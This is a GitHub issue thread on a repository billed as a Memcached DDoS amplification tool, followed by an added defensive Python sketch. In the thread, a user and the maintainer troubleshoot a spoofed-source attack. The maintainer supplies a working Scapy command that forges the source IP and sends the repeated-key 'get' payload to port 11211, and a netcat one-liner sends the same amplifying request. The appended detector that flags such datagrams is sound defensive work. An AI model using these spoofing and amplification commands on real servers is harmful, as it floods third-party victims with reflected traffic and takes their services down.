649 / Memcrashed-DDoS-Exploit

DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API

ip address spoofing failed #2

Closed xin053 closed 6 years ago

xin053 commented 6 years ago

Hello, I am doing a test to simulate memcache ddos. I installed memcache 1.5.4 in kali os through the apt command, and memcache is listening on 127.0.0.1:11211.

First, I set a key with set a 0 0 abcdef, and get it with get a through telnet. It works as planned.

Then I use

python -c "print '\0\0\0\0\0\x01\0\0get a a a a a\r\n'" | nc -nvvu 127.0.0.1 11211 > /dev/null

to simulate an amplification attack, and use wireshark to capture all interfaces without setting any filter. I can see what is going on, and it works as planned too. I can see the large package returned by port 11211.

But when I change the source ip address with

send(IP(src='a public ip address') / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)

I cannot see any response packages from port 11211, just the one package that I sent. It seems like memcache didn't respond to the UDP get command.

Then I test:

send(IP() / UDP(dport=11211) / Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)

I still cannot see any response packages from port 11211. Can you help me? Thanks very much!

649 commented 6 years ago

For Wireshark, use the filter:

udp.port == 11211

(You probably already know this)

For using Scapy, there are some problems that I should address, like you've stated. Scapy does send the traffic; I've seen it myself using the Wireshark filter I provided.

Now the "src" in the IP() function is the source! (Where it comes from, so if you want you can make it look like it came from 1.3.3.7.)

What you're missing is the "dst" (destination), so what you need to be doing is this:

send(IP(src='1.3.3.7', dst='127.0.0.1') / UDP(dport=11211)/Raw(load='\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n'), count=1)

Also, since you're doing this in Python, simply "import scapy" won't work; instead do:

from scapy.all import *
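
Added example, not part of the thread or of the project's code: a detection-side sketch that decodes the 8-byte memcached UDP frame header seen in the payloads above and flags datagrams to port 11211 that look like reflection abuse. The function names, the reason labels and the trusted-network list are assumptions made for illustration.

```python
import ipaddress
import struct
from collections import Counter

# Memcached UDP frame header: request id, sequence number,
# total datagrams in this message, reserved (all 16-bit, network order).
FRAME_HDR = struct.Struct("!HHHH")
READ_CMDS = {"get", "gets", "stats"}

def parse_udp_request(payload):
    """Return the frame header fields and text command, or None if malformed."""
    if len(payload) <= FRAME_HDR.size:
        return None
    req_id, seq, total, reserved = FRAME_HDR.unpack_from(payload)
    line = payload[FRAME_HDR.size:].split(b"\r\n", 1)[0]
    words = line.decode("ascii", "replace").split()
    if not words:
        return None
    return {"request_id": req_id, "seq": seq, "total": total,
            "reserved": reserved, "command": words[0].lower(), "keys": words[1:]}

def classify(src_ip, payload, trusted_nets):
    """List the reasons a UDP datagram to port 11211 looks like reflection abuse."""
    req = parse_udp_request(payload)
    if req is None:
        return ["malformed"]
    reasons = []
    src = ipaddress.ip_address(src_ip)
    if not any(src in ipaddress.ip_network(n) for n in trusted_nets):
        reasons.append("untrusted-source")
    if req["command"] in READ_CMDS:
        repeats = Counter(req["keys"])
        if any(count > 1 for count in repeats.values()):
            reasons.append("repeated-key")  # same value returned several times
        if req["command"] == "stats":
            reasons.append("stats-over-udp")
    return reasons

# Constructed sample input: the payload quoted in the thread plus a normal lookup.
TRUSTED = ["127.0.0.0/8"]  # assumption: only local clients are legitimate
SAMPLES = [
    ("1.3.3.7", b"\x00\x00\x00\x00\x00\x01\x00\x00get a a a a a\r\n"),
    ("127.0.0.1", b"\x00\x2a\x00\x00\x00\x01\x00\x00get a\r\n"),
]

if __name__ == "__main__":
    for ip, data in SAMPLES:
        print(ip, parse_udp_request(data)["command"], classify(ip, data, TRUSTED))
```

The source address in a UDP datagram is unauthenticated, so the untrusted-source check only helps when the listener is reachable from networks where such addresses cannot be forged toward it.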